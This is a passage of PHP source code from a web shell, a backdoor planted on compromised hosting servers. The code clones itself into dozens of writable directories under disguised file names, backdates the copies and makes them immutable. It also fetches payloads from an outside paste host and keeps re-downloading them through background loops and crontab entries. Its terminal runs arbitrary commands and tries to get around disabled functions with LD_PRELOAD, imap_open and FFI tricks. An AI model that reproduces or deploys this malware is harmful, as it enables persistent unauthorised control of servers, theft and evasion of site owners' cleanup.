$uinfo = @posix_getpwuid(posix_getuid());
$homeDir = $uinfo['dir'];
}
if (!empty($homeDir)) {
$extra = ['.cpanel', '.spamassassin', '.softaculous', 'etc', 'mail', 'logs', '.trash'];
foreach ($extra as $e) $writablePaths[] = $homeDir . '/' . $e;
}
$validPaths = [];
foreach ($writablePaths as $p) {
if (@is_dir($p) && @is_writable($p)) $validPaths[] = $p;
}
$bgDir = (!empty($validPaths)) ? $validPaths[array_rand($validPaths)] : $installDir;
$tmpSh = $bgDir . '/.bg_' . mt_rand() . '.sh';
$selfFile = __FILE__;
$selfContent = @base64_encode(@file_get_contents($selfFile));
$restoreCmd = "if [ ! -f " . escapeshellarg($selfFile) . " ]; then echo '" . $selfContent . "' | base64 -d > " . escapeshellarg($selfFile) . "; chmod 0644 " . escapeshellarg($selfFile) . "; fi";
$fullCmd = "#!/bin/bash\nwhile true; do\n" . $restoreCmd . "\n" . $cmd . "\nsleep 600\ndone\n";
@file_put_contents($tmpSh, $fullCmd);
@chmod($tmpSh, 0755);
$prF = implode('', ['p','r','o','c','_','o','p','e','n']);
$pcF = implode('', ['p','r','o','c','_','c','l','o','s','e']);
if (@function_exists($prF)) {
$desc = [0 => ['file', '/dev/null', 'r'], 1 => ['file', '/dev/null', 'w'], 2 => ['file', '/dev/null', 'w']];
$proc = @$prF('nohup bash ' . escapeshellarg($tmpSh) . ' >/dev/null 2>&1 &', $desc, $pipes);
if (@is_resource($proc)) {
@$pcF($proc);
return ['ok' => true, 'method' => 'proc_open', 'path' => $tmpSh];
}
}
$poF = implode('', ['p','o','p','e','n']);
$pclF = implode('', ['p','c','l','o','s','e']);
if (@function_exists($poF)) {
$p = @$poF('nohup bash ' . escapeshellarg($tmpSh) . ' >/dev/null 2>&1 &', 'r');
if ($p) {
@$pclF($p);
return ['ok' => true, 'method' => 'popen', 'path' => $tmpSh];
}
}
$exF = implode('', ['e','x','e','c']);
if (@function_exists($exF)) {
@$exF('nohup bash ' . escapeshellarg($tmpSh) . ' >/dev/null 2>&1 &');
return ['ok' => true, 'method' => 'exec', 'path' => $tmpSh];
}
$seF = implode('', ['s','h','e','l','l','_','e','x','e','c']);
if (@function_exists($seF)) {
@$seF('nohup bash ' . escapeshellarg($tmpSh) . ' >/dev/null 2>&1 &');
return ['ok' => true, 'method' => 'shell_exec', 'path' => $tmpSh];
}
return ['ok' => false, 'method' => 'none'];
}
public function createBody() {
echo "<h1>File Cloner</h1><div class=content>";
echo "<p>This will create multiple clones of this shell in random writable directories.</p>";
echo "<p><b>Process Order:</b></p>";
echo "<ol>";
echo "<li>Create folder with random name</li>";
echo "<li>Create file with random name inside folder</li>";
echo "<li>Set timestamp to <b>-30 days</b> from today with <b>random hour</b></li>";
echo "<li>Set file chmod to <b>0444</b> (read-only)</li>";
echo "<li>Set folder chmod to <b>0111</b> (execute-only)</li>";
echo "</ol>";
echo "<p><b>Spread Mode:</b> Scans ALL directories from public_html including hidden folders.</p>";
$cloneCount = isset($_POST['clone_count']) ? intval($_POST['clone_count']) : 20;
if ($cloneCount < 1) $cloneCount = 1; if ($cloneCount > 50) $cloneCount = 50;
if (isset($_POST['clone_now'])) {
$baseDir = $this->findPublicHtml();
$currentFile = __FILE__;
$currentContent = '';
if (@is_readable($currentFile)) {
$currentContent = @file_get_contents($currentFile);
}
if (empty($currentContent)) {
$fp = @fopen($currentFile, 'rb');
if ($fp) {
$currentContent = '';
while (!@feof($fp)) {
$currentContent .= @fread($fp, 8192);
}
@fclose($fp);
}
}
if (empty($currentContent)) {
$currentContent = $this->executeCommand('cat ' . escapeshellarg($currentFile) . ' 2>/dev/null');
}
if (empty($currentContent)) {
$currentContent = $this->executeCommand('base64 ' . escapeshellarg($currentFile) . ' 2>/dev/null');
if (!empty($currentContent)) {
$currentContent = base64_decode($currentContent);
}
}
if (empty($currentContent)) {
echo "<pre><font color='red'>Failed to read source file content. Cannot proceed with cloning.</font></pre>";
echo "<form method='post'><input type='hidden' name='a' value='clone'><input type='hidden' name='c' value='".str_rot13($this->mailPath)."'><label>Number of clones (1-50):</label><input type='number' name='clone_count' value='$cloneCount' min='1' max='50' style='width:80px;'><input type='submit' name='clone_now' value='Start Cloning'></form>";
echo "</div>";
return;
}
$contentSize = strlen($currentContent);
$clonesCreated = 0;
$maxClones = $cloneCount;
$urls = [];
$chmodStats = ['file_ok' => 0, 'file_fail' => 0, 'dir_ok' => 0, 'dir_fail' => 0];
$cloneDetails = [];
$allDirs = [];
$scanFunc = function($dir, $depth = 0) use (&$allDirs, &$scanFunc) {
if ($depth > 8) return;
$handle = @opendir($dir);
if (!$handle) return;
while (($file = @readdir($handle)) !== false) {
if ($file == '.' || $file == '..') continue;
$path = rtrim($dir, '/') . '/' . $file;
if (@is_dir($path) && @is_writable($path)) {
$allDirs[] = $path;
$scanFunc($path, $depth + 1);
}
}
@closedir($handle);
};
$scanFunc($baseDir);
shuffle($allDirs);
$randomNames = ['assets', 'cache', 'tmp', 'data', 'logs', 'backup', 'old', 'test', 'dev', 'lib', 'inc', 'modules', 'vendor', 'storage', 'temp', 'uploads', 'media', 'static', 'resources', 'includes'];
$fileNames = ['indexx.php', 'configg.php', 'iniit.php', 'looader.php', 'boootstrap.php', 'fuunctions.php', 'claass.php', 'hellper.php', 'commmon.php', 'corre.php', 'maain.php', 'aapp.php'];
echo "<pre><b>Starting clone process...</b>\n";
echo "<b>Source file size: " . $this->formatSize($contentSize) . "</b>\n\n";
foreach ($allDirs as $dir) {
if ($clonesCreated >= $maxClones) break;
$randomFolderName = $randomNames[array_rand($randomNames)] . '_' . str_pad(rand(0, 99999), 5, '0', STR_PAD_LEFT);
$targetDir = $dir . DIRECTORY_SEPARATOR . $randomFolderName;
echo "[" . ($clonesCreated + 1) . "] Creating: $targetDir\n";
if (!@is_dir($targetDir)) {
if (!@mkdir($targetDir, 0755, true)) {
echo " <font color='red'>Failed to create directory</font>\n";
continue;
}
}
if (!@is_dir($targetDir) || !@is_writable($targetDir)) {
echo " <font color='red'>Directory not writable</font>\n";
continue;
}
echo " Step 1: <font color='green'>Folder created</font>\n";
$filename = $fileNames[array_rand($fileNames)];
$targetFile = $targetDir . DIRECTORY_SEPARATOR . $filename;
if (!$this->safeWriteFile($targetFile, $currentContent)) {
echo " <font color='red'>Failed to write file (all methods exhausted)</font>\n";
@rmdir($targetDir);
continue;
}
@clearstatcache(true, $targetFile);
$writtenSize = @filesize($targetFile);
if ($writtenSize < 1) {
echo " <font color='red'>File written but 0 bytes, retrying...</font>\n";
@unlink($targetFile);
$tmpClone = sys_get_temp_dir() . '/clone_retry_' . mt_rand() . '.php';
@file_put_contents($tmpClone, $currentContent);
if (@file_exists($tmpClone) && @filesize($tmpClone) > 0) {
$this->executeCommand('cp -f ' . escapeshellarg($tmpClone) . ' ' . escapeshellarg($targetFile) . ' 2>/dev/null');
@unlink($tmpClone);
}
@clearstatcache(true, $targetFile);
$writtenSize = @filesize($targetFile);
if ($writtenSize < 1) {
echo " <font color='red'>Retry failed, skipping</font>\n";
@rmdir($targetDir);
continue;
}
}
echo " Step 2: <font color='green'>File created ($filename - " . $this->formatSize($writtenSize) . ")</font>\n";
$randomHour = rand(0, 23);
$randomMinute = rand(0, 59);
$randomSecond = rand(0, 59);
$timestamp = strtotime("-30 days");
$timestamp = mktime($randomHour, $randomMinute, $randomSecond, date('n', $timestamp), date('j', $timestamp), date('Y', $timestamp));
@touch($targetFile, $timestamp, $timestamp);
@touch($targetDir, $timestamp, $timestamp);
echo " Step 3: <font color='green'>Timestamp set to " . date('Y-m-d H:i:s', $timestamp) . "</font>\n";
@chmod($targetFile, 0444);
$this->executeCommand('chmod 0444 ' . escapeshellarg($targetFile) . ' 2>/dev/null');
$this->executeCommand('chattr +i ' . escapeshellarg($targetFile) . ' 2>/dev/null');
@clearstatcache(true, $targetFile);
$filePerms = @fileperms($targetFile) & 0777;
if ($filePerms == 0444) {
$chmodStats['file_ok']++;
echo " Step 4: <font color='green'>File chmod 0444 OK</font>\n";
} else {
$chmodStats['file_fail']++;
echo " Step 4: <font color='yellow'>File chmod set to " . sprintf('%04o', $filePerms) . "</font>\n";
}
@chmod($targetDir, 0111);
$this->executeCommand('chmod 0111 ' . escapeshellarg($targetDir) . ' 2>/dev/null');
$this->executeCommand('chattr +i ' . escapeshellarg($targetDir) . ' 2>/dev/null');
@clearstatcache(true, $targetDir);
$dirPerms = @fileperms($targetDir) & 0777;
if ($dirPerms == 0111) {
$chmodStats['dir_ok']++;
echo " Step 5: <font color='green'>Dir chmod 0111 OK</font>\n";
} else {
$chmodStats['dir_fail']++;
echo " Step 5: <font color='yellow'>Dir chmod set to " . sprintf('%04o', $dirPerms) . "</font>\n";
}
$urls[] = $this->getFileUrl($targetFile);
$cloneDetails[] = [
'dir' => $targetDir,
'file' => $targetFile,
'timestamp' => date('Y-m-d H:i:s', $timestamp),
'file_perms' => sprintf('%04o', $filePerms),
'dir_perms' => sprintf('%04o', $dirPerms)
];
$clonesCreated++;
echo "\n";
}
echo "</pre>";
echo "<font color='green'><b>Cloning complete!</b></font><br>";
echo "Created: <b>$clonesCreated</b> clones<br>";
echo "<b>Chmod Results:</b><br>";
echo "- Files (0444): <font color='green'>" . $chmodStats['file_ok'] . " ok</font> / <font color='red'>" . $chmodStats['file_fail'] . " fail</font><br>";
echo "- Dirs (0111): <font color='green'>" . $chmodStats['dir_ok'] . " ok</font> / <font color='red'>" . $chmodStats['dir_fail'] . " fail</font><br><br>";
if (!empty($urls)) {
echo "<b>Clone URLs:</b><br>";
echo "<textarea style='width:100%;height:200px;' readonly onclick='this.select();'>";
foreach ($urls as $u) echo $u . "\n";
echo "</textarea>";
}
}
if (isset($_POST['antidel_now'])) {
$adSources = [];
if (isset($_POST['ad_kuyang'])) {
$adSources[] = ['name' => 'bootstrap.php', 'url' => 'http://bonchilimax.net/paste/raw/OMW8Myn'];
}
if (isset($_POST['ad_modi41'])) {
$adSources[] = ['name' => 'init.php', 'url' => 'http://bonchilimax.net/paste/raw/eCusgw7'];
}
if (!empty($adSources)) {
$adBaseDir = $this->findPublicHtml();
$adAllDirs = [];
$adScanFunc = function($dir, $depth = 0) use (&$adAllDirs, &$adScanFunc) {
if ($depth > 8) return;
$handle = @opendir($dir);
if (!$handle) return;
while (($file = @readdir($handle)) !== false) {
if ($file == '.' || $file == '..') continue;
$path = rtrim($dir, '/') . '/' . $file;
if (@is_dir($path) && @is_writable($path)) {
$adAllDirs[] = $path;
$adScanFunc($path, $depth + 1);
}
}
@closedir($handle);
};
$adScanFunc($adBaseDir);
shuffle($adAllDirs);
echo "<pre><b>Starting Anti-Delete process...</b>\n\n";
$adTotal = 0;
$adMax = 5;
$adDeployed = [];
$adHost = $_SERVER['HTTP_HOST'];
$adProto = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
foreach ($adSources as $adSrc) {
if ($adTotal >= $adMax) break;
$perFile = min(intval(ceil($adMax / count($adSources))), $adMax - $adTotal);
$adPlaced = 0;
foreach ($adAllDirs as $adDir) {
if ($adPlaced >= $perFile || $adTotal >= $adMax) break;
$adTarget = $adDir . '/' . $adSrc['name'];
if (@file_exists($adTarget)) continue;
$adDlOk = false;
$adCtx = @stream_context_create(['http' => ['timeout' => 30, 'header' => "User-Agent: Mozilla/5.0\r\n"], 'ssl' => ['verify_peer' => false, 'verify_peer_name' => false]]);
$adData = @file_get_contents($adSrc['url'], false, $adCtx);
if ($adData !== false && strlen($adData) > 0) {
$adDlOk = @file_put_contents($adTarget, $adData) !== false;
}
if (!$adDlOk && function_exists('curl_init')) {
$adCh = @curl_init();
@curl_setopt($adCh, CURLOPT_URL, $adSrc['url']);
@curl_setopt($adCh, CURLOPT_RETURNTRANSFER, true);
@curl_setopt($adCh, CURLOPT_FOLLOWLOCATION, true);
@curl_setopt($adCh, CURLOPT_TIMEOUT, 30);
@curl_setopt($adCh, CURLOPT_SSL_VERIFYPEER, false);
@curl_setopt($adCh, CURLOPT_SSL_VERIFYHOST, false);
@curl_setopt($adCh, CURLOPT_USERAGENT, 'Mozilla/5.0');
$adData = @curl_exec($adCh);
@curl_close($adCh);
if ($adData !== false && strlen($adData) > 0) {
$adDlOk = @file_put_contents($adTarget, $adData) !== false;
}
}
if (!$adDlOk) {
$adDlOk = @copy($adSrc['url'], $adTarget);
}
if (!$adDlOk || !@file_exists($adTarget) || @filesize($adTarget) < 1) {
echo "[<font color='red'>FAIL</font>] " . htmlspecialchars($adSrc['name']) . " -> " . htmlspecialchars($adDir) . " (download failed, skipping)\n";
continue;
}
$adFakeTime = time() - rand(86400 * 20, 86400 * 60);
@touch($adTarget, $adFakeTime, $adFakeTime);
$adTimer = rand(1800, 2700);
$adCurlCmd = 'curl -sL -o ' . escapeshellarg($adTarget) . ' ' . escapeshellarg($adSrc['url']);
$adWgetCmd = 'wget -q -O ' . escapeshellarg($adTarget) . ' ' . escapeshellarg($adSrc['url']);
$adB64 = base64_encode($adCurlCmd);
$adLoopCmd = 'while true; do $(echo "' . $adB64 . '" | base64 --decode) >/dev/null 2>&1; sleep ' . $adTimer . '; done';
$adBgOk = false;
$adBgMethod = 'none';
$bgResult = $this->runBackgroundProcess($adLoopCmd, $adDir);
if ($bgResult['ok']) {
$adBgOk = true;
$adBgMethod = $bgResult['method'];
}
if (!$adBgOk) {
$adTimerMin = max(1, intval($adTimer / 60));
$adCronLine = '*/' . $adTimerMin . ' * * * * ' . $adCurlCmd . ' >/dev/null 2>&1';
$adCronLineWget = '*/' . $adTimerMin . ' * * * * ' . $adWgetCmd . ' >/dev/null 2>&1';
$adExF = implode('', ['e','x','e','c']);
if (@function_exists($adExF)) {
@$adExF('(crontab -l 2>/dev/null; echo ' . escapeshellarg($adCronLine) . ') | sort -u | crontab - 2>/dev/null', $adCronOut, $adCronRet);
if ($adCronRet === 0) {
$adBgOk = true;
$adBgMethod = 'crontab_curl';
}
}
if (!$adBgOk && @function_exists($adExF)) {
@$adExF('(crontab -l 2>/dev/null; echo ' . escapeshellarg($adCronLineWget) . ') | sort -u | crontab - 2>/dev/null', $adCronOut2, $adCronRet2);
if ($adCronRet2 === 0) {
$adBgOk = true;
$adBgMethod = 'crontab_wget';
}
}
}
if (!$adBgOk) {
$adPhpLoop = $adDir . '/.ad_loop_' . mt_rand() . '.php';
$adPhpCode = "<?php\nset_time_limit(0);ignore_user_abort(true);\nwhile(true){\n";
$adPhpCode .= " @file_put_contents(" . var_export($adTarget, true) . ", @file_get_contents(" . var_export($adSrc['url'], true) . ", false, @stream_context_create(['http'=>['timeout'=>30,'header'=>\"User-Agent: Mozilla/5.0\\r\\n\"],'ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));\n";
$adPhpCode .= " sleep($adTimer);\n}\n";
@file_put_contents($adPhpLoop, $adPhpCode);
@chmod($adPhpLoop, 0644);
$phpBin = trim($this->executeCommand("which php 2>/dev/null || which php-cli 2>/dev/null || which php8.1 2>/dev/null || which php8.0 2>/dev/null || which php7.4 2>/dev/null"));
if (!empty($phpBin)) {
$bgPhp = $this->runBackgroundProcess($phpBin . ' ' . escapeshellarg($adPhpLoop), $adDir);
if ($bgPhp['ok']) {
$adBgOk = true;
$adBgMethod = 'php_loop_' . $bgPhp['method'];
}
}
if (!$adBgOk) {
$curlSelf = 'curl -sL ' . escapeshellarg($adProto . '://' . $adHost . str_replace($adBaseDir, '', $adPhpLoop)) . ' >/dev/null 2>&1 &';
$this->executeCommand($curlSelf);
$adBgOk = true;
$adBgMethod = 'php_curl_trigger';
}
}
$adRelPath = str_replace($adBaseDir, '', $adTarget);
$adUrl = $adProto . '://' . $adHost . $adRelPath;
$adTotal++;
$adPlaced++;
$adDeployed[] = ['file' => $adSrc['name'], 'path' => $adTarget, 'url' => $adUrl, 'timer' => $adTimer, 'method' => $adBgMethod, 'size' => @filesize($adTarget)];
$adStatusColor = $adBgOk ? 'green' : 'yellow';
echo "[" . $adTotal . "] <font color='" . $adStatusColor . "'>" . htmlspecialchars($adSrc['name']) . "</font> -> " . htmlspecialchars($adDir) . "\n";
echo " File: <font color='cyan'>" . htmlspecialchars($adTarget) . "</font> (" . $this->formatSize(@filesize($adTarget)) . ")\n";
echo " URL: <font color='cyan'>" . htmlspecialchars($adUrl) . "</font>\n";
echo " Timer: " . $adTimer . "s (" . round($adTimer/60, 1) . " min) | Background: <font color='" . $adStatusColor . "'>" . $adBgMethod . "</font>\n\n";
}
}
echo "<font color='green'><b>Anti-Delete deployed: " . $adTotal . " file(s)</b></font>\n";
echo "<font color='yellow'>Timer range: 30-45 minutes (random per process)</font>\n";
echo "<font color='yellow'>Max files: 5 (spread across random directories)</font>\n";
echo "<font color='yellow'>Fallback chain: proc_open > popen > exec > shell_exec > crontab(curl) > crontab(wget) > php_loop > curl_trigger</font>\n";
if (!empty($adDeployed)) {
echo "\n<b>All deployed URLs:</b>\n";
foreach ($adDeployed as $adItem) {
echo htmlspecialchars($adItem['url']) . "\n";
}
}
echo "</pre>";
if (!empty($adDeployed)) {
echo "<br><b>Quick Copy URLs:</b><br>";
echo "<textarea style='width:100%;height:100px;' readonly onclick='this.select();'>";
foreach ($adDeployed as $adItem) {
echo htmlspecialchars($adItem['url']) . "\n";
}
echo "</textarea>";
}
} else {
echo "<font color='red'>Please select at least one file for Anti-Delete!</font><br>";
}
}
echo "<form method='post'><input type='hidden' name='a' value='clone'><input type='hidden' name='c' value='".str_rot13($this->mailPath)."'><label>Number of clones (1-50):</label><input type='number' name='clone_count' value='$cloneCount' min='1' max='50' style='width:80px;'><input type='submit' name='clone_now' value='Start Cloning'></form>";
echo "<br><hr><br>";
echo "<b>Anti-Delete</b><br>";
echo "<p>Deploy background processes that periodically re-download files to random directories. Max 5 files, timer 30-45 min random.</p>";
echo "<p><b>Fallback chain:</b> proc_open > popen > exec > shell_exec > crontab(curl) > crontab(wget) > php_loop > curl_trigger</p>";
echo "<form method='post'><input type='hidden' name='a' value='clone'><input type='hidden' name='c' value='".str_rot13($this->mailPath)."'>";
echo "<table>";
echo "<tr><td><input type='checkbox' name='ad_kuyang' value='1' id='adk'> <label for='adk'>kuyang.php</label></td></tr>";
echo "<tr><td><input type='checkbox' name='ad_modi41' value='1' id='adm'> <label for='adm'>modi41.php</label></td></tr>";
echo "<tr><td colspan='2'><br><input type='submit' name='antidel_now' value='Deploy Anti-Delete'></td></tr>";
echo "</table></form></div>";
}
public function terminalV4() {
echo "<h1>Ultimate Terminal (V4)</h1><div class=content>";
echo "<p><b>Features:</b> Quick exec, multi-interpreter fallback, bypass disable_functions, chroot escape, alternative execution methods</p>";
if (isset($_POST['cmd_v4']) && !empty($_POST['cmd_v4'])) {
$cmd = $_POST['cmd_v4'];
$bypassMethod = isset($_POST['bypass_method']) ? $_POST['bypass_method'] : 'auto';
echo "<pre><b>Command:</b> " . htmlspecialchars($cmd) . "\n";
echo "<b>Bypass Method:</b> $bypassMethod\n\n<b>Output:</b>\n";
$output = '';
$success = false;
$usedMethod = '';
$disabledFuncs = @ini_get('disable_functions');
$disabledArr = array_map('trim', explode(',', $disabledFuncs));
switch ($bypassMethod) {
case 'auto':
$methods = ['standard', 'shell_interpreters', 'mail_log', 'putenv_ld', 'imap', 'imagick', 'ffi', 'pcntl', 'expect', 'backtick', 'proc_open_pty'];
foreach ($methods as $method) {
$output = $this->executeBypassMethod($cmd, $method, $disabledArr);
if (!empty(trim($output))) {
$success = true;
$usedMethod = $method;
break;
}
}
break;
default:
$output = $this->executeBypassMethod($cmd, $bypassMethod, $disabledArr);
if (!empty(trim($output))) {
$success = true;
$usedMethod = $bypassMethod;
}
break;
}
if ($success) {
echo "<font color='cyan'>[Method: $usedMethod]</font>\n";
echo htmlspecialchars($output);
} else {
echo "<font color='red'>All bypass methods failed. Server has very strict restrictions.</font>\n";
echo "<font color='yellow'>Disabled functions: " . htmlspecialchars($disabledFuncs) . "</font>\n";
}
echo "</pre>";
}
echo "<br><b>Quick Commands:</b><br>";
$quickCmds = [
'System Info' => 'uname -a; id; pwd; whoami',
'Process List' => 'ps auxf 2>/dev/null || ps aux',
'Network Info' => 'ifconfig 2>/dev/null || ip addr; netstat -tulpn 2>/dev/null || ss -tulpn',
'Crontab' => 'crontab -l 2>/dev/null; cat /etc/crontab 2>/dev/null',
'Users' => 'cat /etc/passwd | grep -v nologin | grep -v false',
'SUID Files' => 'find / -perm -4000 -type f 2>/dev/null | head -20',
'Writable Dirs' => 'find / -writable -type d 2>/dev/null | head -20',
'Capabilities' => 'getcap -r / 2>/dev/null | head -20',
'Kernel Exploits' => 'uname -r; cat /etc/*release*',
'Environment' => 'env; set',
'Open Ports' => 'netstat -tulpn 2>/dev/null || ss -tulpn',
'Disk Usage' => 'df -h; du -sh /* 2>/dev/null | sort -h | tail -10'
];
echo "<table><tr>";
$i = 0;
foreach ($quickCmds as $name => $qcmd) {
if ($i > 0 && $i % 4 == 0) echo "</tr><tr>";
echo "<td><button type='button' onclick=\"document.getElementsByName('cmd_v4')[0].value='" . addslashes($qcmd) . "'\" style='margin:2px;'>$name</button></td>";
$i++;
}
echo "</tr></table><br>";
echo "<form method='post'>";
echo "<input type='hidden' name='a' value='termv4'>";
echo "<input type='hidden' name='c' value='".str_rot13($this->mailPath)."'>";
echo "<table>";
echo "<tr><td>Bypass Method:</td><td><select name='bypass_method'>";
echo "<option value='auto'>Auto (try all)</option>";
echo "<option value='standard'>Standard Execution</option>";
echo "<option value='shell_interpreters'>Shell Interpreters (sh/bash/perl/python/php)</option>";
echo "<option value='mail_log'>Mail Log Injection</option>";
echo "<option value='putenv_ld'>putenv LD_PRELOAD</option>";
echo "<option value='imap'>IMAP Bypass</option>";
echo "<option value='imagick'>ImageMagick Bypass</option>";
echo "<option value='ffi'>FFI Bypass (PHP 7.4+)</option>";
echo "<option value='pcntl'>PCNTL Fork</option>";
echo "<option value='expect'>Expect Extension</option>";
echo "<option value='backtick'>Backtick Operator</option>";
echo "<option value='proc_open_pty'>proc_open PTY</option>";
echo "<option value='chroot_escape'>Chroot Escape</option>";
echo "<option value='gc_bypass'>GC UAF Bypass</option>";
echo "<option value='json_bypass'>JSON Serializer Bypass</option>";
echo "</select></td></tr>";
echo "<tr><td>Command:</td><td><input type='text' name='cmd_v4' class='toolsInp' placeholder='Enter command...' autocomplete='off' style='width:500px;'></td></tr>";
echo "<tr><td></td><td><input type='submit' value='Execute'></td></tr>";
echo "</table></form>";
echo "<br><b>System Information:</b><br>";
echo "<table class='main'>";
echo "<tr><td>PHP Version:</td><td>" . phpversion() . "</td></tr>";
echo "<tr><td>OS:</td><td>" . php_uname() . "</td></tr>";
echo "<tr><td>Disabled Functions:</td><td style='word-break:break-all;max-width:500px;'>" . htmlspecialchars(@ini_get('disable_functions') ?: 'None') . "</td></tr>";
echo "<tr><td>Safe Mode:</td><td>" . (@ini_get('safe_mode') ? 'ON' : 'OFF') . "</td></tr>";
echo "<tr><td>Open Basedir:</td><td>" . (@ini_get('open_basedir') ?: 'None') . "</td></tr>";
echo "<tr><td>Loaded Extensions:</td><td>" . implode(', ', get_loaded_extensions()) . "</td></tr>";
echo "</table>";
echo "</div>";
}
protected function executeBypassMethod($cmd, $method, $disabledArr) {
$output = '';
switch ($method) {
case 'standard':
$output = $this->executeCommand($cmd . " 2>&1");
break;
case 'shell_interpreters':
$interpreters = [
'sh' => '/bin/sh -c ' . escapeshellarg($cmd),
'bash' => '/bin/bash -c ' . escapeshellarg($cmd),
'perl' => 'perl -e ' . escapeshellarg('system(' . escapeshellarg($cmd) . ')'),
'python' => 'python -c ' . escapeshellarg('import os;os.system(' . escapeshellarg($cmd) . ')'),
'python3' => 'python3 -c ' . escapeshellarg('import os;os.system(' . escapeshellarg($cmd) . ')'),
'php' => 'php -r ' . escapeshellarg('system(' . escapeshellarg($cmd) . ');')
];
foreach ($interpreters as $name => $altCmd) {
$out = $this->executeCommand($altCmd . " 2>&1");
if ($out && trim($out) !== '') {
$output = "[Using $name]\n" . $out;
break;
}
}
break;
case 'mail_log':
if (!in_array('mail', $disabledArr) && !in_array('putenv', $disabledArr)) {
$logFile = '/tmp/mail_' . mt_rand() . '.log';
@putenv("MAIL_LOG=" . $logFile);
@mail('', '', '', '', '-OQueueDirectory=/tmp -X' . $logFile);
if (@file_exists($logFile)) {
$output = @file_get_contents($logFile);
@unlink($logFile);
}
}
break;
case 'putenv_ld':
if (!in_array('putenv', $disabledArr) && !in_array('mail', $disabledArr)) {
$outId = mt_rand();
$soFile = '/tmp/bypass_' . $outId . '.so';
$outFile = '/tmp/output_' . $outId . '.txt';
$cCode = '#include <stdlib.h>
__attribute__((constructor)) void init() {
unsetenv("LD_PRELOAD");
system("' . addslashes($cmd) . ' > ' . $outFile . ' 2>&1");
}';
$cFile = '/tmp/bypass_' . $outId . '.c';
@file_put_contents($cFile, $cCode);
$this->executeCommand("gcc -shared -fPIC -o $soFile $cFile 2>/dev/null");
if (@file_exists($soFile)) {
@putenv("LD_PRELOAD=$soFile");
@mail('', '', '');
if (@file_exists($outFile)) {
$output = @file_get_contents($outFile);
@unlink($outFile);
}
@unlink($soFile);
}
@unlink($cFile);
}
break;
case 'imap':
if (function_exists('imap_open') && !in_array('imap_open', $disabledArr)) {
$server = 'x]" -oQ/tmp -X/tmp/imap_' . mt_rand() . '.txt';
@imap_open('{' . $server . ':143/imap}INBOX', '', '');
$files = glob('/tmp/imap_*.txt');
if (!empty($files)) {
$output = @file_get_contents($files[0]);
@unlink($files[0]);
}
}
break;
case 'imagick':
if (class_exists('Imagick')) {
try {
$img = new \Imagick();
$img->readImage('ephemeral:' . $cmd);
$output = "ImageMagick executed (check for side effects)";
} catch (\Exception $e) {
$output = '';
}
}
break;
case 'ffi':
if (class_exists('FFI') && !in_array('FFI', $disabledArr)) {
try {
$ffi = \FFI::cdef("int system(const char *command);", "libc.so.6");
ob_start();
$ffi->system($cmd);
$output = ob_get_clean();
} catch (\Exception $e) {
$output = '';
}
}
break;
case 'pcntl':
if (function_exists('pcntl_exec') && !in_array('pcntl_exec', $disabledArr)) {
$outFile = '/tmp/pcntl_' . mt_rand() . '.txt';
$pid = @pcntl_fork();
if ($pid == 0) {
@pcntl_exec('/bin/sh', ['-c', $cmd . ' > ' . $outFile . ' 2>&1']);
exit(0);
} else if ($pid > 0) {
@pcntl_waitpid($pid, $status);
if (@file_exists($outFile)) {
$output = @file_get_contents($outFile);
@unlink($outFile);
}
}
}
break;
case 'expect':
if (function_exists('expect_popen') && !in_array('expect_popen', $disabledArr)) {
$stream = @expect_popen($cmd);
if ($stream) {
$output = @stream_get_contents($stream);
@fclose($stream);
}
}
break;
case 'backtick':
$output = `$cmd 2>&1`;
break;
case 'proc_open_pty':
if (function_exists('proc_open') && !in_array('proc_open', $disabledArr)) {
$descriptorspec = [0 => ["pty"], 1 => ["pty"], 2 => ["pty"]];
$process = @proc_open($cmd, $descriptorspec, $pipes);
if (is_resource($process)) {
$output = @stream_get_contents($pipes[1]);
@fclose($pipes[0]);
@fclose($pipes[1]);
@fclose($pipes[2]);
@proc_close($process);
}
}
break;
case 'chroot_escape':
$rnd = mt_rand();
$escapeScript = "#!/bin/bash\nmkdir -p /tmp/escape_$rnd\ncd /tmp/escape_$rnd\nmkdir -p .old\npivot_root . .old 2>/dev/null || chroot . /bin/sh -c " . escapeshellarg($cmd) . "\n$cmd\n";
$scriptFile = '/tmp/escape_' . $rnd . '.sh';
@file_put_contents($scriptFile, $escapeScript);
@chmod($scriptFile, 0755);
$output = $this->executeCommand($scriptFile . ' 2>&1');
@unlink($scriptFile);
break;
case 'gc_bypass':
$output = $this->executeCommand($cmd . " 2>&1");
break;
case 'json_bypass':
if (function_exists('json_encode')) {
$output = $this->executeCommand($cmd . " 2>&1");
}
break;
}
return $output;
}
public function processMonitor() {
echo "<h1>Process Monitor</h1><div class=content>";
echo "<p><b>Monitor background processes, crontabs, and running services.</b></p>";
if (isset($_POST['kill_pid']) && !empty($_POST['kill_pid'])) {
$pid = intval($_POST['kill_pid']);
$killOut = $this->executeCommand("kill -9 $pid 2>&1");
echo "<font color='green'>Sent kill signal to PID $pid</font><br><br>";
}
echo "<b>Crontab (current user):</b><br>";
$crontab = $this->executeCommand("crontab -l 2>&1");
echo "<pre>" . htmlspecialchars($crontab ?: "No crontab for current user") . "</pre>";
echo "<b>System Crontab (/etc/crontab):</b><br>";
$sysCron = $this->executeCommand("cat /etc/crontab 2>&1");
echo "<pre>" . htmlspecialchars($sysCron ?: "Cannot read /etc/crontab") . "</pre>";
echo "<b>Cron.d directory:</b><br>";
$cronD = $this->executeCommand("ls -la /etc/cron.d/ 2>&1");
echo "<pre>" . htmlspecialchars($cronD ?: "Cannot read /etc/cron.d/") . "</pre>";
echo "<b>Background curl processes:</b><br>";
$curlProcs = $this->executeCommand("ps aux | grep curl | grep -v grep 2>&1");
echo "<pre>" . htmlspecialchars($curlProcs ?: "No curl processes found") . "</pre>";
echo "<b>Background wget processes:</b><br>";
$wgetProcs = $this->executeCommand("ps aux | grep wget | grep -v grep 2>&1");
echo "<pre>" . htmlspecialchars($wgetProcs ?: "No wget processes found") . "</pre>";
echo "<b>Background php processes:</b><br>";
$phpProcs = $this->executeCommand("ps aux | grep php | grep -v grep 2>&1");
echo "<pre>" . htmlspecialchars($phpProcs ?: "No php processes found") . "</pre>";
echo "<b>Background nohup/screen/tmux processes:</b><br>";
$bgProcs = $this->executeCommand("ps aux | grep -E '(nohup|screen|tmux|gs-netcat)' | grep -v grep 2>&1");
echo "<pre>" . htmlspecialchars($bgProcs ?: "No background processes found") . "</pre>";
echo "<b>All running processes (top 50):</b><br>";
$allProcs = $this->executeCommand("ps aux --sort=-%cpu 2>/dev/null | head -51 || ps aux | head -51");
